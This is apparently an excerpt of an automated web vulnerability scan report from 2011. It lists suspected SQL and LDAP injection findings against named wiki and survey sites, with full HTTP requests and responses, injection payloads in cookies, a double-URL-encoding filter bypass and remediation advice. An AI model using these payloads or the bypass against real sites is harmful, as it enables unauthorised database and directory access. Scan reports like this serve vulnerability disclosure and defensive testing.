<meta name="keywords" content="HTC Sprint Touch - HTC Smartphone Wiki, Sprint,Sprint Touch,TouchFlo" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The WPC-action cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the WPC-action cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/reset+password+for+my+cingular+8125 HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d1--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:05:04 GMT Server: Apache Set-Cookie: wab=joinButton=42; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:05:04 GMT; Path=/ P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TVp9CNB8VOTvX0KyUR4o0L; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=7F135B88425F21547100B4AF05FFCEA6; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:05:04 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 42059
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>reset password for my cingular 8125 - HTC Smartphone Wiki</title>
<meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
Request 2
GET /page/reset+password+for+my+cingular+8125 HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d2--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:05:04 GMT Server: Apache Set-Cookie: wab=joinButton=58; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:05:04 GMT; Path=/ P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TVp9CNB8VOTpTEoGUg3f3M; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:05:04 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 42058
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>reset password for my cingular 8125 - HTC Smartphone Wiki</title>
<meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
The wetst cookie appears to be vulnerable to SQL injection attacks. The payloads 18609109'%20or%201%3d1--%20 and 18609109'%20or%201%3d2--%20 were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/reset+password+for+my+cingular+8125 HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r18609109'%20or%201%3d1--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:05:58 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TDf/d4BLFVKnX33iuXhXee; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=AE20ED40A75BF632BC7ED48CB3C37C04; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:05:58 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 42059
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>reset password for my cingular 8125 - HTC Smartphone Wiki</title>
<meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
Request 2
GET /page/reset+password+for+my+cingular+8125 HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r18609109'%20or%201%3d2--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:05:59 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TDf/d4BLFVKmXQVXoFXMNs; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:05:59 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 42058
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>reset password for my cingular 8125 - HTC Smartphone Wiki</title>
<meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
The WPC-action cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the WPC-action cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/t8282+operating+system HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d1--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:44 GMT Server: Apache Set-Cookie: wab=joinButton=24; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:03:44 GMT; Path=/ P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RwOfZSdTXsRlTemit3XzC9; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=E29016370988C60F1E3EEBA8BAB0725D; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:44 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 40934
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>t8282 operating system - HTC Smartphone Wiki</title>
<meta name="keywords" content="t8282 operating system - HTC Smartphone Wiki, htc t8282 windows mobile" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<script type="text/javascript"> //<![CDATA[ var global_inits = {"N ...[SNIP]...
Request 2
GET /page/t8282+operating+system HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d2--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:44 GMT Server: Apache Set-Cookie: wab=joinButton=95; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:03:44 GMT; Path=/ P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RwOfZSdTXsRr9r2MjsGHTx; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:44 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 40934
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>t8282 operating system - HTC Smartphone Wiki</title>
<meta name="keywords" content="t8282 operating system - HTC Smartphone Wiki, htc t8282 windows mobile" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /tc%2527/CreateLog.aspx HTTP/1.1 Host: web.survey-poll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 403 Forbidden Content-Length: 1758 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 16:29:35 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be displayed</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; ...[SNIP]... <h2>HTTP Error 403.1 - Forbidden: Execute access is denied.<br> ...[SNIP]...
Request 2
GET /tc%2527%2527/CreateLog.aspx HTTP/1.1 Host: web.survey-poll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 400 Bad Request Connection: close Date: Sat, 05 Feb 2011 16:29:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html
<html><body>Bad Request</body></html>
2. LDAP injection
There are 8 instances of this issue:
LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.
Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue remediation
If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
The wetst cookie appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /page/HTC+ALPINE HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:02:25 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1R/ygmgSHYZPKI20TtYbsJm; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=E58B38A7E034A4FD9D63E96B232CD545; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:02:25 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 43249
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Alpine - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Alpine - HTC Smartphone Wiki, Alpine,phone specs" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
Request 2
GET /page/HTC+ALPINE HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:02:26 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1R/ygmgSHYZPBTPa46o3vcX; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:02:26 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 43248
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Alpine - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Alpine - HTC Smartphone Wiki, Alpine,phone specs" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The wetst cookie appears to be vulnerable to LDAP injection attacks.
The payloads 35377aaaf664e1c3)(sn=* and 35377aaaf664e1c3)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /page/HTC+BLUE+ANGEL HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=35377aaaf664e1c3)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:04:43 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Q+6Wn+9o/R/6napQKp+AHS; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=62AF78062B691081ABF216F8E028B2C6; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:04:43 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 57728
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Blue Angel - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Blue Angel - HTC Smartphone Wiki, Blue Angel,Smartphone" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
Request 2
GET /page/HTC+BLUE+ANGEL HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=35377aaaf664e1c3)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:04:44 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Q+6Wn+9o/R/6boEIAXRvZr; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:04:44 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 57727
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Blue Angel - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Blue Angel - HTC Smartphone Wiki, Blue Angel,Smartphone" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The wetst cookie appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /page/HTC+Smartphone+Wiki/history HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:02:15 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RgUcALK9RCBCnNbZM/Rypn; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=66B5CBC9BBBD8C7C01B9EDA22E06D15E; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:02:15 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 57599
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Smartphone Wiki - History Page - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Smartphone Wiki - History Page - HTC Smartphone Wiki, Android,Device home page,Home,Home page,HTC,Pocket PC,Smartphone" /> <meta name="description" content="HTC Smartphone Wiki - HTC Smartphone Wiki - History Page" />
Request 2
GET /page/HTC+Smartphone+Wiki/history HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:02:15 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RgUcALK9RCBNDxtr28xs5l; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:02:15 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 57599
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Smartphone Wiki - History Page - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Smartphone Wiki - History Page - HTC Smartphone Wiki, Android,Device home page,Home,Home page,HTC,Pocket PC,Smartphone" /> <meta name="description" content="HTC Smartphone Wiki - HTC Smartphone Wiki - History Page" />
The wetst cookie appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
